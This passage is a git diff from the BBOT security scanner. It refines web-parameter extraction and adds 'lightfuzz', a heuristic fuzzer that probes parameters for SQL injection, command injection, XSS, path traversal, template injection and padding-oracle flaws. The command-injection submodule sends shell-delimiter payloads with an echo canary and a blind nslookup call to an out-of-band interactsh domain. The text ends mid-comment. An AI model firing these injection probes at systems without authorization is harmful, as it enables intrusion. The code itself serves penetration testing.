r"/\$\.ajax\(\{[^\<$\$]*\}\)/s nocase" + extraction_regex = None + output_type = "BODYJSON" + ajax_content_regexes = { + "url": r"url\s*:\s*['\"](.*?)['\"]", + "type": r"type\s*:\s*['\"](.*?)['\"]", + "content_type": r"contentType\s*:\s*['\"](.*?)['\"]", + "data": r"data:.*(\{[^}]*\})", + } + + def extract(self): + # Iterate through each regex in ajax_content_regexes + extracted_values = {} + for key, pattern in self.ajax_content_regexes.items(): + match = re.search(pattern, self.result) + if match: + # Store the matched value in the dictionary + extracted_values[key] = match.group(1) + + # check to see if the format is defined as JSON + if "content_type" in extracted_values.keys(): + if extracted_values["content_type"] == "application/json": + # If we cant figure out the parameter names, there is no point in continuing + if "data" in extracted_values.keys(): + if "url" in extracted_values.keys(): + form_url = extracted_values["url"] + else: + form_url = None + + form_parameters = {} + try: + s = extracted_values["data"] + s = re.sub(r"(\w+)\s*:", r'"\1":', s) # Quote keys + s = re.sub(r":\s*(\w+)", r': "\1"', s) # Quote values if they are unquoted + data = json.loads(s) + except (ValueError, SyntaxError): + return None + for p in data.keys(): + form_parameters[p] = None + + for parameter_name in form_parameters: + yield ( + "BODYJSON", + parameter_name, + None, + form_url, + _exclude_key(form_parameters, parameter_name), + ) + class GetForm(ParameterExtractorRule): name = "GET Form" discovery_regex = r'/]*\bmethod=["\']?get["\']?[^>]*>.*<\/form>/s nocase' - form_content_regexes = [ - bbot_regexes.input_tag_regex, - bbot_regexes.select_tag_regex, - bbot_regexes.textarea_tag_regex, - ] + form_content_regexes = { + "input_tag_regex": bbot_regexes.input_tag_regex, + "input_tag_regex2": bbot_regexes.input_tag_regex2, + "select_tag_regex": bbot_regexes.select_tag_regex, + "textarea_tag_regex": bbot_regexes.textarea_tag_regex, + "button_tag_regex": bbot_regexes.button_tag_regex, + "button_tag_regex2": bbot_regexes.button_tag_regex2, + "_input_tag_novalue_regex": bbot_regexes.input_tag_novalue_regex, + } extraction_regex = bbot_regexes.get_form_regex output_type = "GETPARAM" def extract(self): forms = self.extraction_regex.findall(str(self.result)) for form_action, form_content in forms: + if not form_action or form_action == "#": + form_action = None + + elif form_action.startswith("./"): + form_action = form_action.lstrip(".") + form_parameters = {} - for form_content_regex in self.form_content_regexes: + for form_content_regex_name, form_content_regex in self.form_content_regexes.items(): input_tags = form_content_regex.findall(form_content) + if input_tags: + if form_content_regex_name == "_input_tag_novalue_regex": + form_parameters.setdefault(input_tags[0], None) - for parameter_name, original_value in input_tags: - form_parameters[parameter_name] = original_value + else: + if form_content_regex_name in ["input_tag_regex2", "button_tag_regex2"]: + input_tags = [(b, a) for a, b in input_tags] - for parameter_name, original_value in form_parameters.items(): - yield ( - self.output_type, - parameter_name, - original_value, - form_action, - _exclude_key(form_parameters, parameter_name), - ) + for parameter_name, original_value in input_tags: + # form_parameters[parameter_name] = original_value.strip() + form_parameters.setdefault(parameter_name, original_value.strip()) + + + for parameter_name, original_value in form_parameters.items(): + yield ( + self.output_type, + parameter_name, + original_value, + form_action, + _exclude_key(form_parameters, parameter_name), + ) + + class GetForm2(GetForm): + extraction_regex = bbot_regexes.get_form_regex2 class PostForm(GetForm): name = "POST Form" @@ -461,6 +545,21 @@ class PostForm(GetForm): extraction_regex = bbot_regexes.post_form_regex output_type = "POSTPARAM" + class PostForm2(PostForm): + extraction_regex = bbot_regexes.post_form_regex2 + + class PostForm_NoAction(PostForm): + name = "POST Form (no action)" + extraction_regex = bbot_regexes.post_form_regex_noaction + + # underscore ensure generic forms runs last, so it doesn't cause dedupe to stop full form detection + class _GenericForm(GetForm): + name = "Generic Form" + discovery_regex = r"/]*>.*<\/form>/s nocase" + + extraction_regex = bbot_regexes.generic_form_regex + output_type = "GETPARAM" + def __init__(self, excavate): super().__init__(excavate) self.parameterExtractorCallbackDict = {} @@ -472,12 +571,12 @@ def __init__(self, excavate): regexes_component_list.append(f"${r.__name__} = {r.discovery_regex}") regexes_component = " ".join(regexes_component_list) self.yara_rules["parameter_extraction"] = ( - rf'rule parameter_extraction {{meta: description = "contains POST form" strings: {regexes_component} condition: any of them}}' + rf'rule parameter_extraction {{meta: description = "contains Parameter" strings: {regexes_component} condition: any of them}}' ) async def process(self, yara_results, event, yara_rule_settings, discovery_context): for identifier, results in yara_results.items(): - for result in results: + for result in results: if identifier not in self.parameterExtractorCallbackDict.keys(): raise ExcavateError("ParameterExtractor YaraRule identified reference non-existent submodule") parameterExtractorSubModule = self.parameterExtractorCallbackDict[identifier]( @@ -495,12 +594,20 @@ async def process(self, yara_results, event, yara_rule_settings, discovery_conte self.excavate.debug( f"Found Parameter [{parameter_name}] in [{parameterExtractorSubModule.name}] ParameterExtractor Submodule" ) - endpoint = event.data["url"] if not endpoint else endpoint - url = ( - endpoint - if endpoint.startswith(("http://", "https://")) - else f"{event.parsed_url.scheme}://{event.parsed_url.netloc}{endpoint}" - ) + # If we have a full URL, leave it as-is + + if endpoint and endpoint.startswith(("http://", "https://")): + url = endpoint + + # The endpoint is usually a form action - we should use it if we have it. If not, default to URL. + else: + # Use the original URL as the base and resolve the endpoint correctly in case of relative paths + base_url = ( + f"{event.parsed_url.scheme}://{event.parsed_url.netloc}{event.parsed_url.path}" + ) + if self.excavate.retain_querystring and len(event.parsed_url.query) > 0: + base_url += f"?{event.parsed_url.query}" + url = urljoin(base_url, endpoint) if self.excavate.helpers.validate_parameter(parameter_name, parameter_type): if self.excavate.in_bl(parameter_name) is False: @@ -598,12 +705,13 @@ async def process(self, yara_results, event, yara_rule_settings, discovery_conte class SerializationExtractor(ExcavateRule): regexes = { - "Java": re.compile(r"[^a-zA-Z0-9\/+]rO0[a-zA-Z0-9+\/]+={0,2}"), - "DOTNET": re.compile(r"[^a-zA-Z0-9\/+]AAEAAAD\/\/[a-zA-Z0-9\/+]+={0,2}"), - "PHP_Array": re.compile(r"[^a-zA-Z0-9\/+]YTo[xyz0123456][a-zA-Z0-9+\/]+={0,2}"), - "PHP_String": re.compile(r"[^a-zA-Z0-9\/+]czo[xyz0123456][a-zA-Z0-9+\/]+={0,2}"), - "PHP_Object": re.compile(r"[^a-zA-Z0-9\/+]Tzo[xyz0123456][a-zA-Z0-9+\/]+={0,2}"), - "Possible_Compressed": re.compile(r"[^a-zA-Z0-9\/+]H4sIAAAAAAAA[a-zA-Z0-9+\/]+={0,2}"), + "Java": re.compile(r"[^a-zA-Z0-9\/+][\"']?rO0[a-zA-Z0-9+\/]+={0,2}"), + "Ruby": re.compile(r"[^[^a-zA-Z0-9\/+][\"']?BAh[a-zA-Z0-9+\/]+={0,2}"), + "DOTNET": re.compile(r"[^a-zA-Z0-9\/+][\"']?AAEAAAD\/\/[a-zA-Z0-9\/+]+={0,2}"), + "PHP_Array": re.compile(r"[^a-zA-Z0-9\/+][\"']?YTo[xyz0123456][a-zA-Z0-9+\/]+={0,2}"), + "PHP_String": re.compile(r"[^a-zA-Z0-9\/+][\"']?czo[xyz0123456][a-zA-Z0-9+\/]+={0,2}"), + "PHP_Object": re.compile(r"[^a-zA-Z0-9\/+][\"']?Tzo[xyz0123456][a-zA-Z0-9+\/]+={0,2}"), + "Possible_Compressed": re.compile(r"[^a-zA-Z0-9\/+][\"']?H4sIAAAA[a-zA-Z0-9+\/]+={0,2}"), } yara_rules = {} @@ -701,7 +809,7 @@ class URLExtractor(ExcavateRule): tags = "spider-danger" description = "contains tag with src or href attribute" strings: - $url_attr = /<[^>]+(href|src)=["\'][^"\']*["\'][^>]*>/ + $url_attr = /<[^>]+(href|src|action)=["\']?[^"\']*["\']?[^>]*>/ condition: $url_attr } @@ -899,9 +1007,10 @@ async def setup(self): return True async def search(self, data, event, content_type, discovery_context="HTTP response"): + # TODO: replace this JSON/XML extraction with our lightfuzz envelope stuff + if not data: return None - decoded_data = await self.helpers.re.recursive_decode(data) if self.parameter_extraction: @@ -933,12 +1042,30 @@ async def search(self, data, event, content_type, discovery_context="HTTP respon await self.emit_event(data, "WEB_PARAMETER", event, context=context) return - for result in self.yara_rules.match(data=f"{data}\n{decoded_data}"): - rule_name = result.rule - if rule_name in self.yara_preprocess_dict: - await self.yara_preprocess_dict[rule_name](result, event, discovery_context) - else: - self.hugewarning(f"YARA Rule {rule_name} not found in pre-compiled rules") + # Initialize the list of data items to process + data_items = [] + + # Check if data and decoded_data are identical + if data == decoded_data: + data_items.append(("data", data)) # Add only one since both are the same + else: + data_items.append(("data", data)) + data_items.append(("decoded_data", decoded_data)) + + for label, data_instance in data_items: + # Your existing processing code + for result in self.yara_rules.match(data=f"{data_instance}"): + rule_name = result.rule + + # Skip specific operations for 'parameter_extraction' rule on decoded_data + if label == "decoded_data" and rule_name == "parameter_extraction": + continue + + # Check if rule processing function exists + if rule_name in self.yara_preprocess_dict: + await self.yara_preprocess_dict[rule_name](result, event, discovery_context) + else: + self.hugewarning(f"YARA Rule {rule_name} not found in pre-compiled rules") async def handle_event(self, event): if event.type == "HTTP_RESPONSE": @@ -971,6 +1098,42 @@ async def handle_event(self, event): context = f"Excavate parsed a URL directly from the scan target for parameters and found [GETPARAM] Parameter Name: [{parameter_name}] and emitted a WEB_PARAMETER for it" await self.emit_event(data, "WEB_PARAMETER", event, context=context) + # If parameter_extraction is enabled and we assigned custom headers, emit them as WEB_PARAMETER + if self.parameter_extraction is True: + custom_cookies = self.scan.web_config.get("http_cookies", {}) + for custom_cookie_name, custom_cookie_value in custom_cookies.items(): + description = f"HTTP Extracted Parameter [{custom_cookie_name}] (Custom Cookie)" + data = { + "host": event.parsed_url.hostname, + "type": "COOKIE", + "name": custom_cookie_name, + "original_value": custom_cookie_value, + "url": self.url_unparse("COOKIE", event.parsed_url), + "description": description, + "additional_params": _exclude_key(custom_cookies, custom_cookie_name), + } + context = ( + f"Excavate saw a custom cookie set [{custom_cookie_name}], and emitted a WEB_PARAMETER for it" + ) + await self.emit_event(data, "WEB_PARAMETER", event, context=context) + + custom_headers = self.scan.web_config.get("http_headers", {}) + for custom_header_name, custom_header_value in custom_headers.items(): + description = f"HTTP Extracted Parameter [{custom_header_name}] (Custom Header)" + data = { + "host": event.parsed_url.hostname, + "type": "HEADER", + "name": custom_header_name, + "original_value": custom_header_value, + "url": self.url_unparse("HEADER", event.parsed_url), + "description": description, + "additional_params": _exclude_key(custom_headers, custom_header_name), + } + context = ( + f"Excavate saw a custom header set [{custom_header_name}], and emitted a WEB_PARAMETER for it" + ) + await self.emit_event(data, "WEB_PARAMETER", event, context=context) + data = event.data # process response data @@ -990,10 +1153,10 @@ async def handle_event(self, event): self.debug(f"Cookie found without '=': {header_value}") continue else: - cookie_name = header_value.split("=")[0] - cookie_value = header_value.split("=")[1].split(";")[0] + cookie_name, _, remainder = header_value.partition("=") + cookie_value = remainder.split(";")[0] - if self.in_bl(cookie_value) is False: + if self.in_bl(cookie_name) is False: self.assigned_cookies[cookie_name] = cookie_value description = f"Set-Cookie Assigned Cookie [{cookie_name}]" data = { diff --git a/bbot/modules/lightfuzz.py b/bbot/modules/lightfuzz.py new file mode 100644 index 0000000000..ee3f04b20b --- /dev/null +++ b/bbot/modules/lightfuzz.py @@ -0,0 +1,197 @@ +from bbot.modules.base import BaseModule + +from urllib.parse import urlunparse +from bbot.errors import InteractshError + +from .lightfuzz_submodules.cmdi import CmdILightfuzz +from .lightfuzz_submodules.crypto import CryptoLightfuzz +from .lightfuzz_submodules.path import PathTraversalLightfuzz +from .lightfuzz_submodules.sqli import SQLiLightfuzz +from .lightfuzz_submodules.ssti import SSTILightfuzz +from .lightfuzz_submodules.xss import XSSLightfuzz +from .lightfuzz_submodules.serial import SerialLightfuzz + + +class lightfuzz(BaseModule): + watched_events = ["URL", "WEB_PARAMETER"] + produced_events = ["FINDING", "VULNERABILITY"] + flags = ["active", "aggressive", "web-thorough"] + + submodules = { + "sqli": {"description": "SQL Injection", "module": SQLiLightfuzz}, + "cmdi": {"description": "Command Injection", "module": CmdILightfuzz}, + "xss": {"description": "Cross-site Scripting", "module": XSSLightfuzz}, + "path": {"description": "Path Traversal", "module": PathTraversalLightfuzz}, + "ssti": {"description": "Server-side Template Injection", "module": SSTILightfuzz}, + "crypto": {"description": "Cryptography Probe", "module": CryptoLightfuzz}, + "serial": {"description": "Unsafe Deserialization Probe", "module": SerialLightfuzz}, + } + + options = {"force_common_headers": False, "enabled_submodules": [], "disable_post": False} + options_desc = { + "force_common_headers": "Force emit commonly exploitable parameters that may be difficult to detect", + "enabled_submodules": "A list of submodules to enable. Empty list enabled all modules.", + "disable_post": "Disable processing of POST parameters, avoiding form submissions.", + } + + meta = { + "description": "Find Web Parameters and Lightly Fuzz them using a heuristic based scanner", + "author": "@liquidsec", + "created_date": "2024-06-28", + } + common_headers = ["x-forwarded-for", "user-agent"] + in_scope_only = True + + _module_threads = 4 + + async def setup(self): + self.event_dict = {} + self.interactsh_subdomain_tags = {} + self.interactsh_instance = None + self.disable_post = self.config.get("disable_post", False) + self.enabled_submodules = self.config.get("enabled_submodules") + + for m in self.enabled_submodules: + if m not in self.submodules: + self.hugewarning(f"Invalid Lightfuzz submodule ({m}) specified in enabled_modules") + return False + + for submodule, submodule_dict in self.submodules.items(): + if submodule in self.enabled_submodules or self.enabled_submodules == []: + setattr(self, submodule, True) + self.hugeinfo(f"Lightfuzz {submodule_dict['description']} Submodule Enabled") + + if submodule == "cmdi" and self.scan.config.get("interactsh_disable", False) is False: + try: + self.interactsh_instance = self.helpers.interactsh() + self.interactsh_domain = await self.interactsh_instance.register( + callback=self.interactsh_callback + ) + except InteractshError as e: + self.warning(f"Interactsh failure: {e}") + else: + setattr(self, submodule, False) + return True + + async def interactsh_callback(self, r): + full_id = r.get("full-id", None) + if full_id: + if "." in full_id: + details = self.interactsh_subdomain_tags.get(full_id.split(".")[0]) + if not details["event"]: + return + await self.emit_event( + { + "severity": "CRITICAL", + "host": str(details["event"].host), + "url": details["event"].data["url"], + "description": f"OS Command Injection (OOB Interaction) Type: [{details['type']}] Parameter Name: [{details['name']}] Probe: [{details['probe']}]", + }, + "VULNERABILITY", + details["event"], + ) + else: + # this is likely caused by something trying to resolve the base domain first and can be ignored + self.debug("skipping result because subdomain tag was missing") + + def _outgoing_dedup_hash(self, event): + return hash( + ( + "lightfuzz", + str(event.host), + event.data["url"], + event.data["description"], + event.data.get("type", ""), + event.data.get("name", ""), + ) + ) + + def url_unparse(self, param_type, parsed_url): + if param_type == "GETPARAM": + querystring = "" + else: + querystring = parsed_url.query + return urlunparse( + ( + parsed_url.scheme, + parsed_url.netloc, + parsed_url.path, + "", + querystring if self.retain_querystring else "", + "", + ) + ) + + async def run_submodule(self, submodule, event): + submodule_instance = submodule(self, event) + await submodule_instance.fuzz() + if len(submodule_instance.results) > 0: + for r in submodule_instance.results: + event_data = {"host": str(event.host), "url": event.data["url"], "description": r["description"]} + + envelopes = getattr(event, "envelopes", None) + envelope_summary = getattr(envelopes, "summary", None) + if envelope_summary: + # Append the envelope summary to the description + event_data["description"] += f" Envelopes: [{envelope_summary}]" + + if r["type"] == "VULNERABILITY": + event_data["severity"] = r["severity"] + await self.emit_event( + event_data, + r["type"], + event, + ) + + async def handle_event(self, event): + if event.type == "URL": + if self.config.get("force_common_headers", False) is False: + return False + + for h in self.common_headers: + description = f"Speculative (Forced) Header [{h}]" + data = { + "host": str(event.host), + "type": "HEADER", + "name": h, + "original_value": None, + "url": event.data, + "description": description, + } + await self.emit_event(data, "WEB_PARAMETER", event) + + elif event.type == "WEB_PARAMETER": + # check connectivity to url + connectivity_test = await self.helpers.request(event.data["url"], timeout=10) + + if connectivity_test: + for submodule, submodule_dict in self.submodules.items(): + if getattr(self, submodule): + self.debug(f"Starting {submodule_dict['description']} fuzz()") + await self.run_submodule(submodule_dict["module"], event) + else: + self.debug(f'WEB_PARAMETER URL {event.data["url"]} failed connectivity test, aborting') + + async def cleanup(self): + if self.interactsh_instance: + try: + await self.interactsh_instance.deregister() + self.debug( + f"successfully deregistered interactsh session with correlation_id {self.interactsh_instance.correlation_id}" + ) + except InteractshError as e: + self.warning(f"Interactsh failure: {e}") + + async def finish(self): + if self.interactsh_instance: + await self.helpers.sleep(5) + try: + for r in await self.interactsh_instance.poll(): + await self.interactsh_callback(r) + except InteractshError as e: + self.debug(f"Error in interact.sh: {e}") + + async def filter_event(self, event): + if event.type == "WEB_PARAMETER" and self.disable_post and event.data["type"] == "POSTPARAM": + return False, "POST parameter disabled in lightfuzz module" + return True diff --git a/bbot/modules/lightfuzz_submodules/__init__.py b/bbot/modules/lightfuzz_submodules/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/bbot/modules/lightfuzz_submodules/base.py b/bbot/modules/lightfuzz_submodules/base.py new file mode 100644 index 0000000000..61e61c9d2a --- /dev/null +++ b/bbot/modules/lightfuzz_submodules/base.py @@ -0,0 +1,245 @@ +import copy + + +class BaseLightfuzz: + def __init__(self, lightfuzz, event): + self.lightfuzz = lightfuzz + self.event = event + self.results = [] + + def additional_params_process(self, additional_params, additional_params_populate_blank_empty): + if additional_params_populate_blank_empty is False: + return additional_params + new_additional_params = {} + for k, v in additional_params.items(): + if v == "" or v is None: + new_additional_params[k] = self.lightfuzz.helpers.rand_string(10, numeric_only=True) + else: + new_additional_params[k] = v + return new_additional_params + + def compare_baseline( + self, event_type, probe, cookies, additional_params_populate_empty=False, speculative_mode="GETPARAM" + ): + probe = self.outgoing_probe_value(probe) + http_compare = None + + if event_type == "SPECULATIVE": + event_type = speculative_mode + + if event_type == "GETPARAM": + baseline_url = f"{self.event.data['url']}?{self.event.data['name']}={probe}" + if "additional_params" in self.event.data.keys() and self.event.data["additional_params"] is not None: + baseline_url = self.lightfuzz.helpers.add_get_params( + baseline_url, self.event.data["additional_params"], encode=False + ).geturl() + http_compare = self.lightfuzz.helpers.http_compare( + baseline_url, cookies=cookies, include_cache_buster=False + ) + elif event_type == "COOKIE": + cookies_probe = {self.event.data["name"]: f"{probe}"} + http_compare = self.lightfuzz.helpers.http_compare( + self.event.data["url"], include_cache_buster=False, cookies={**cookies, **cookies_probe} + ) + elif event_type == "HEADER": + headers = {self.event.data["name"]: f"{probe}"} + http_compare = self.lightfuzz.helpers.http_compare( + self.event.data["url"], include_cache_buster=False, headers=headers, cookies=cookies + ) + elif event_type == "POSTPARAM": + data = {self.event.data["name"]: f"{probe}"} + if self.event.data["additional_params"] is not None: + data.update( + self.additional_params_process( + self.event.data["additional_params"], additional_params_populate_empty + ) + ) + http_compare = self.lightfuzz.helpers.http_compare( + self.event.data["url"], method="POST", include_cache_buster=False, data=data, cookies=cookies + ) + elif event_type == "BODYJSON": + data = {self.event.data["name"]: f"{probe}"} + if self.event.data["additional_params"] is not None: + data.update( + self.additional_params_process( + self.event.data["additional_params"], additional_params_populate_empty + ) + ) + http_compare = self.lightfuzz.helpers.http_compare( + self.event.data["url"], method="POST", include_cache_buster=False, json=data, cookies=cookies + ) + return http_compare + + async def baseline_probe(self, cookies): + if self.event.data.get("eventtype") in ["POSTPARAM", "BODYJSON"]: + method = "POST" + else: + method = "GET" + + return await self.lightfuzz.helpers.request( + method=method, + cookies=cookies, + url=self.event.data.get("url"), + allow_redirects=False, + retries=1, + timeout=10, + ) + + async def compare_probe( + self, + http_compare, + event_type, + probe, + cookies, + additional_params_populate_empty=False, + additional_params_override={}, + speculative_mode="GETPARAM", + ): + probe = self.outgoing_probe_value(probe) + additional_params = copy.deepcopy(self.event.data.get("additional_params", {})) + if additional_params_override: + for k, v in additional_params_override.items(): + additional_params[k] = v + + if event_type == "SPECULATIVE": + event_type = speculative_mode + + if event_type == "GETPARAM": + probe_url = f"{self.event.data['url']}?{self.event.data['name']}={probe}" + if additional_params: + probe_url = self.lightfuzz.helpers.add_get_params(probe_url, additional_params, encode=False).geturl() + compare_result = await http_compare.compare(probe_url, cookies=cookies) + elif event_type == "COOKIE": + cookies_probe = {self.event.data["name"]: probe} + compare_result = await http_compare.compare(self.event.data["url"], cookies={**cookies, **cookies_probe}) + elif event_type == "HEADER": + headers = {self.event.data["name"]: f"{probe}"} + compare_result = await http_compare.compare(self.event.data["url"], headers=headers, cookies=cookies) + elif event_type == "POSTPARAM": + data = {self.event.data["name"]: f"{probe}"} + if additional_params: + data.update(self.additional_params_process(additional_params, additional_params_populate_empty)) + compare_result = await http_compare.compare( + self.event.data["url"], method="POST", data=data, cookies=cookies + ) + + elif event_type == "BODYJSON": + data = {self.event.data["name"]: f"{probe}"} + if additional_params: + data.update(self.additional_params_process(additional_params, additional_params_populate_empty)) + compare_result = await http_compare.compare( + self.event.data["url"], method="POST", json=data, cookies=cookies + ) + return compare_result + + async def standard_probe( + self, + event_type, + cookies, + probe, + timeout=10, + additional_params_populate_empty=False, + speculative_mode="GETPARAM", + allow_redirects=False, + ): + + + + + + probe = self.outgoing_probe_value(probe) + + if event_type == "SPECULATIVE": + event_type = speculative_mode + + method = "GET" + if event_type == "GETPARAM": + url = f"{self.event.data['url']}?{self.event.data['name']}={probe}" + if "additional_params" in self.event.data.keys() and self.event.data["additional_params"] is not None: + url = self.lightfuzz.helpers.add_get_params( + url, self.event.data["additional_params"], encode=False + ).geturl() + else: + url = self.event.data["url"] + if event_type == "COOKIE": + cookies_probe = {self.event.data["name"]: probe} + cookies = {**cookies, **cookies_probe} + if event_type == "HEADER": + headers = {self.event.data["name"]: probe} + else: + headers = {} + + data = None + json_data = None + + if event_type == "POSTPARAM": + + + + method = "POST" + data = {self.event.data["name"]: probe} + if self.event.data["additional_params"] is not None: + data.update( + self.additional_params_process( + self.event.data["additional_params"], additional_params_populate_empty + ) + ) + + elif event_type == "BODYJSON": + method = "POST" + json_data = {self.event.data["name"]: probe} + if self.event.data["additional_params"] is not None: + json_data.update( + self.additional_params_process( + self.event.data["additional_params"], additional_params_populate_empty + ) + ) + + self.lightfuzz.debug(f"standard_probe requested URL: [{url}]") + return await self.lightfuzz.helpers.request( + method=method, + cookies=cookies, + headers=headers, + data=data, + json=json_data, + url=url, + allow_redirects=allow_redirects, + retries=0, + timeout=timeout, + ) + + + def metadata(self): + metadata_string = f"Parameter: [{self.event.data['name']}] Parameter Type: [{self.event.data['type']}]" + if self.event.data["original_value"] != "" and self.event.data["original_value"] is not None: + metadata_string += ( + f" Original Value: [{self.lightfuzz.helpers.truncate_string(self.event.data['original_value'],200)}]" + ) + return metadata_string + + def incoming_probe_value(self, populate_empty=True): + envelopes = getattr(self.event, "envelopes", None) + probe_value = "" + if envelopes is not None: + probe_value = envelopes.get_subparam() + self.lightfuzz.debug(f"incoming_probe_value (after unpacking): {probe_value} with envelopes [{envelopes}]") + if not probe_value: + if populate_empty is True: + probe_value = self.lightfuzz.helpers.rand_string(10, numeric_only=True) + else: + probe_value = "" + # if not isinstance(probe_value, str): + # raise ValueError( + # f"incoming_probe_value should always be a string (got {type(probe_value)} / {probe_value})" + # ) + probe_value = str(probe_value) + return probe_value + + def outgoing_probe_value(self, outgoing_probe_value): + self.lightfuzz.debug(f"outgoing_probe_value (before packing): {outgoing_probe_value} / {self.event}") + envelopes = getattr(self.event, "envelopes", None) + if envelopes is not None: + envelopes.set_subparam(value=outgoing_probe_value) + outgoing_probe_value = envelopes.pack() + self.lightfuzz.debug(f"outgoing_probe_value (after packing): {outgoing_probe_value} with envelopes [{envelopes}] / {self.event}") + return outgoing_probe_value diff --git a/bbot/modules/lightfuzz_submodules/cmdi.py b/bbot/modules/lightfuzz_submodules/cmdi.py new file mode 100644 index 0000000000..57acfdbb5b --- /dev/null +++ b/bbot/modules/lightfuzz_submodules/cmdi.py @@ -0,0 +1,69 @@ +from bbot.errors import HttpCompareError +from .base import BaseLightfuzz + +import urllib.parse + + +class CmdILightfuzz(BaseLightfuzz): + async def fuzz(self): + cookies = self.event.data.get("assigned_cookies", {}) + probe_value = self.incoming_probe_value() + + canary = self.lightfuzz.helpers.rand_string(10, numeric_only=True) + http_compare = self.compare_baseline(self.event.data["type"], probe_value, cookies) + + cmdi_probe_strings = [ + "AAAA", + ";", + "&&", + "||", + "&", + "|", + ] + + positive_detections = [] + for p in cmdi_probe_strings: + try: + echo_probe = f"{probe_value}{p} echo {canary} {p}" + if self.event.data["type"] == "GETPARAM": + echo_probe = urllib.parse.quote(echo_probe.encode(), safe="") + cmdi_probe = await self.compare_probe(http_compare, self.event.data["type"], echo_probe, cookies) + if cmdi_probe[3]: + if canary in cmdi_probe[3].text and "echo" not in cmdi_probe[3].text: + self.lightfuzz.debug(f"canary [{canary}] found in response when sending probe [{p}]") + if p == "AAAA": + self.lightfuzz.warning( + f"False Postive Probe appears to have been triggered for {self.event.data['url']}, aborting remaining detection" + ) + return + positive_detections.append(p) + except HttpCompareError as e: + self.lightfuzz.debug(e) + continue + if len(positive_detections) > 0: + self.results.append( + { + "type": "FINDING", + "description": f"POSSIBLE OS Command Injection. {self.metadata()} Detection Method: [echo canary] CMD Probe Delimeters: [{' '.join(positive_detections)}]", + } + ) + + # Blind OS Command Injection + + if self.lightfuzz.interactsh_instance: + self.lightfuzz.event_dict[self.event.data["url"]] = self.event + for p in cmdi_probe_strings: + subdomain_tag = self.lightfuzz.helpers.rand_string(4, digits=False) + self.lightfuzz.interactsh_subdomain_tags[subdomain_tag] = { + "event": self.event, + "type": self.event.data["type"], + "name": self.event.data["name"], + "probe": p, + } + interactsh_probe = f"{p} nslookup {subdomain_tag}.{self.lightfuzz.interactsh_domain} {p}" + + if self.event.data["type"] == "GETPARAM": + interactsh_probe = urllib.parse.quote(interactsh_probe.encode(), safe="") + await self.standard_probe( + self.event.data["type"], cookies, f"{probe_value}{interactsh_probe}", timeout=15 + ) diff --git a/bbot/modules/lightfuzz_submodules/crypto.py b/bbot/modules/lightfuzz_submodules/crypto.py new file mode 100644 index 0000000000..3ebb3bacd1 --- /dev/null +++ b/bbot/modules/lightfuzz_submodules/crypto.py @@ -0,0 +1,352 @@ +import base64 +import hashlib +from .base import BaseLightfuzz +from bbot.errors import HttpCompareError +from urllib.parse import unquote, quote + + +class CryptoLightfuzz(BaseLightfuzz): + @staticmethod + def is_hex(s): + try: + bytes.fromhex(s) + return True + except ValueError: + return False + + @staticmethod + def is_base64(s): + try: + if base64.b64encode(base64.b64decode(s)).decode() == s: + return True + except Exception: + return False + return False + + crypto_error_strings = [ + "invalid mac", + "padding is invalid and cannot be removed", + "bad data", + "length of the data to decrypt is invalid", + "specify a valid key size", + "invalid algorithm specified", + "object already exists", + "key does not exist", + "the parameter is incorrect", + "cryptography exception", + "access denied", + "unknown error", + "invalid provider type", + "no valid cert found", + "cannot find the original signer", + "signature description could not be created", + "crypto operation failed", + "OpenSSL Error", + ] + + @staticmethod + def format_agnostic_decode(input_string, urldecode=False): + encoding = "unknown" + if urldecode: + input_string = unquote(input_string) + if CryptoLightfuzz.is_hex(input_string): + data = bytes.fromhex(input_string) + encoding = "hex" + elif CryptoLightfuzz.is_base64(input_string): + data = base64.b64decode(input_string) + encoding = "base64" + else: + data = str + return data, encoding + + @staticmethod + def format_agnostic_encode(data, encoding, urlencode=False): + if encoding == "hex": + encoded_data = data.hex() + elif encoding == "base64": + encoded_data = base64.b64encode(data).decode("utf-8") # base64 encoding returns bytes, decode to string + else: + raise ValueError("Unsupported encoding type specified") + if urlencode: + return quote(encoded_data) + return encoded_data + + @staticmethod + def modify_string(input_string, action="truncate", position=None, extension_length=1): + if not isinstance(input_string, str): + input_string = str(input_string) + + data, encoding = CryptoLightfuzz.format_agnostic_decode(input_string) + if encoding != "base64" and encoding != "hex": + raise ValueError("Input must be either hex or base64 encoded") + + if action == "truncate": + modified_data = data[:-1] # Remove the last byte + elif action == "mutate": + if not position: + position = len(data) // 2 + if position < 0 or position >= len(data): + raise ValueError("Position out of range") + byte_list = list(data) + byte_list[position] = (byte_list[position] + 1) % 256 + modified_data = bytes(byte_list) + elif action == "extend": + modified_data = data + (b"\x00" * extension_length) + elif action == "flip": + if not position: + position = len(data) // 2 + if position < 0 or position >= len(data): + raise ValueError("Position out of range") + byte_list = list(data) + byte_list[position] ^= 0xFF # Flip all bits in the byte at the specified position + modified_data = bytes(byte_list) + else: + raise ValueError("Unsupported action") + return CryptoLightfuzz.format_agnostic_encode(modified_data, encoding) + + def is_likely_encrypted(self, data, threshold=4.5): + entropy = self.lightfuzz.helpers.calculate_entropy(data) + return entropy >= threshold + + def cryptanalysis(self, input_string): + likely_crypto = False + possible_block_cipher = False + data, encoding = self.format_agnostic_decode(input_string) + likely_crypto = self.is_likely_encrypted(data) + data_length = len(data) + if data_length % 8 == 0: + possible_block_cipher = True + return likely_crypto, possible_block_cipher + + @staticmethod + def possible_block_sizes(ciphertext_length): + potential_block_sizes = [8, 16] + possible_sizes = [] + for block_size in potential_block_sizes: + num_blocks = ciphertext_length // block_size + if ciphertext_length % block_size == 0 and num_blocks >= 2: + possible_sizes.append(block_size) + return possible_sizes + + async def padding_oracle_execute(self, original_data, encoding, block_size, cookies, possible_first_byte=True): + ivblock = b"\x00" * block_size + paddingblock = b"\x00" * block_size + datablock = original_data[-block_size:] + if possible_first_byte: + baseline_byte = b"\xff" + starting_pos = 0 + else: + baseline_byte = b"\x00" + starting_pos = 1 + baseline = self.compare_baseline( + self.event.data["type"], + self.format_agnostic_encode(ivblock + paddingblock[:-1] + baseline_byte + datablock, encoding), + cookies, + ) + differ_count = 0 + for i in range(starting_pos, starting_pos + 254): + byte = bytes([i]) + oracle_probe = await self.compare_probe( + baseline, + self.event.data["type"], + self.format_agnostic_encode(ivblock + paddingblock[:-1] + byte + datablock, encoding), + cookies, + ) + if oracle_probe[0] is False and "body" in oracle_probe[1]: + differ_count += 1 + + if i == 2: + if possible_first_byte is True: + # Thats two results which appear "different". Since this is the first run, it's entirely possible \x00 was the correct padding. + # We will break from this loop and redo it with the last byte as the baseline instead of the first + return None + else: + # Now that we have tried the run twice, we know 